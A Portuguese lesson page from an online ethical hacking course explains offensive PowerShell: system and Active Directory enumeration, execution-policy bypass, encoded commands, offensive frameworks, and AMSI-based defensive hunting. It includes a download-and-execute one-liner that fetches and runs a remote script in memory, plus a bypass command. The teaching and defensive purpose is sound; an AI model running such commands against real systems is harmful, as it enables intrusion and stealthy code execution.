PowerShell para atacantes
PowerShell ofensivo
PowerShell para atacantes é uma aula grátis de Ethical Hacking Academy no CoddyKit. Esta é a aula 4 de 4. Você pode ler a aula completa abaixo gratuitamente — depois pratica ao vivo no navegador com um editor de código integrado e um tutor de IA 24/7. Faz parte do caminho de aprendizado de Ethical Hacking Academy, e seu progresso é sincronizado entre a web e o app CoddyKit. O curso de Ethical Hacking Academy inclui 4 aulas no total.
Por que PowerShell
O PowerShell vem integrado ao Windows, tem integração profunda com o OS e o .NET e é considerado confiável pelos administradores. Isso faz dele uma ferramenta favorita de uso dos recursos nativos do sistema por invasores — sem necessidade de instalar malware.
Esta lição aborda conceitos de PowerShell ofensivo que você precisa entender para atacar e defender o Windows.
Comandos e o Pipeline
Os comandos do PowerShell são cmdlets no formato Verbo-Substantivo. Eles passam objetos avançados — não apenas texto — pelo pipeline, tornando a enumeração poderosa.
Get-Process | Where-Object { $_.CPU -gt 10 } | Select-Object Name, IdEnumeração do Sistema
Os invasores usam comandos integrados para examinar rapidamente um host — usuários, serviços, rede e atualizações.
Get-LocalUser
Get-Service | Where-Object Status -eq 'Running'
Get-NetTCPConnection -State ListenA Política de Execução Não é Segurança
A política de execução restringe a execução de arquivos de script, mas não é um limite de segurança. Muitos parâmetros simples permitem contorná-la, portanto os defensores não devem depender dela.
powershell -ExecutionPolicy Bypass -File script.ps1Baixar e Executar
Uma técnica comum busca uma carga útil e a executa na memória, deixando poucos vestígios no disco. Por isso, o monitoramento da rede e do AMSI é importante.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/tool.ps1')Comandos Codificados
O parâmetro -EncodedCommand executa PowerShell codificado em Base64, sendo frequentemente usado para ocultar a intenção de uma inspeção casual e de filtros simples.
Os defensores decodificam esses comandos a partir dos registros para revelar o que realmente foi executado.
powershell -EncodedCommand <base64-here>Estruturas Ofensivas
Os conjuntos de ferramentas maduros baseiam-se nestes recursos básicos:
- PowerSploit / PowerView — enumeração de AD e pós-exploração.
- Empire / Covenant — comando e controle.
- Nishang — scripts ofensivos.
Atualmente, a maioria é amplamente identificada pelas assinaturas das defesas.
Reconhecimento do Active Directory
Em um domínio, o PowerShell (PowerView ou o módulo de AD) mapeia usuários, grupos e relações de confiança — a base para encontrar um caminho até o administrador do domínio.
Get-ADUser -Filter * -Properties LastLogonDate
Get-ADGroupMember 'Domain Admins'AMSI e Registros
A Microsoft adicionou defesas específicas contra o uso indevido do PowerShell:
- AMSI (Interface de Verificação Antimalware) verifica o conteúdo dos scripts antes da execução.
- Registro de Blocos de Script registra o que é executado.
- Modo de Linguagem Restrita limita recursos perigosos.
Os invasores tentam contornar o AMSI; os defensores monitoram os registros.
Caça Defensiva
As equipes de defesa procuram PowerShell malicioso verificando:
- Comandos codificados ou ofuscados.
- Buscas de rede com
DownloadString/IEX. - Processos pai incomuns (o Office iniciando o PowerShell).
- Registros de blocos de script do AMSI e do ID de Evento 4104.
Use de Forma Ética
Essas técnicas são poderosas e correspondem diretamente a invasões reais. Execute-as somente em seu próprio laboratório ou com autorização explícita por escrito.
Praticar o lado defensivo — ler registros e identificar ocorrências do AMSI — é tão valioso quanto praticar o lado ofensivo.
Verificação Rápida
Avalie a política de execução como um controle.
Recapitulação
Você explorou o PowerShell ofensivo:
- Cmdlets baseados em objetos tornam a enumeração poderosa e discreta (uso dos recursos nativos do sistema).
- Baixar e executar, comandos codificados e estruturas como PowerView/Empire.
- A política de execução não é segurança; AMSI e o registro de blocos de script são as verdadeiras defesas.
- Opere sempre de forma ética e estude o lado defensivo.
Isso conclui o curso de Fundamentos Internos do Windows.
Perguntas Frequentes
A aula “PowerShell para atacantes” é grátis?
Sim — o texto completo de “PowerShell para atacantes” é grátis para ler aqui na web. Para praticá-la interativamente (um editor de código integrado e um tutor de IA 24/7) e desbloquear o restante do curso de Ethical Hacking Academy, atualize para CoddyKit PRO. O curso de Ethical Hacking Academy inclui 4 aulas no total.
O que vou aprender em “PowerShell para atacantes”?
PowerShell ofensivo Você pratica Ethical Hacking Academy com código prático que executa diretamente no navegador, e um tutor de IA 24/7 responde suas dúvidas enquanto trabalha na aula.
Preciso ter experiência prévia para começar Ethical Hacking Academy?
Nenhuma experiência prévia é necessária. Ethical Hacking Academy no CoddyKit é estruturado para alunos iniciantes até avançados, então você pode começar aqui ou desde o início e aprender no seu ritmo. Esta é a aula 4 de 4.
Quanto tempo leva a aula “PowerShell para atacantes”?
A maioria das aulas CoddyKit leva cerca de 5–10 minutos. Cada uma é compacta e interativa, então você faz progresso constante e retoma exatamente de onde parou entre web e app.
Posso escrever e executar código nesta aula de Ethical Hacking Academy?
Sim. Cada aula de Ethical Hacking Academy inclui um editor de código integrado, então você escreve e executa código real direto no navegador e recebe feedback de IA instantaneamente — nenhuma configuração local necessária.
Todas as aulas deste curso
- Arquitetura do Windows
- O Registro
- Autenticação do Windows
- PowerShell para atacantes